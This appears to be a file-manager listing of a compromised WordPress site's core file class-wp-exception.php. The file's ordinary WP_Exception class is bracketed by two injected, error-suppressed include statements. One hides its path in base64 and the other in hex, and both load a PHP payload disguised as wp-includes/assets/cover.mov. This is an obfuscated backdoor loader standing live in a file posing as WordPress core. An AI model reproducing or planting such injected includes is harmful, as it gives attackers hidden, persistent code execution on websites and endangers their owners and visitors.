File "class-wp-exception.php"

Full path: /home/joudast/www/wp-includes/blocks/navigation-link/class-wp-exception.php
File size: 465 B
MIME-type: text/x-php
Charset: utf-8

Download   Open   Edit   Advanced Editor   Back

<?php
@include base64_decode("L2hvbWUvam91ZGFzdC93d3cvd3AtaW5jbHVkZXMvYXNzZXRzL2NvdmVyLm1vdg==");

/**
 * WP_Exception class
 *
 * @package WordPress
 * @since 6.7.0
 */

/**
 * Core base Exception class.
 *
 * Future, more specific, Exceptions should always extend this base class.
 *
 * @since 6.7.0
 */
class WP_Exception extends Exception {}

@include pack("H*", "2f686f6d652f6a6f75646173742f7777772f77702d696e636c756465732f6173736574732f636f7665722e6d6f76");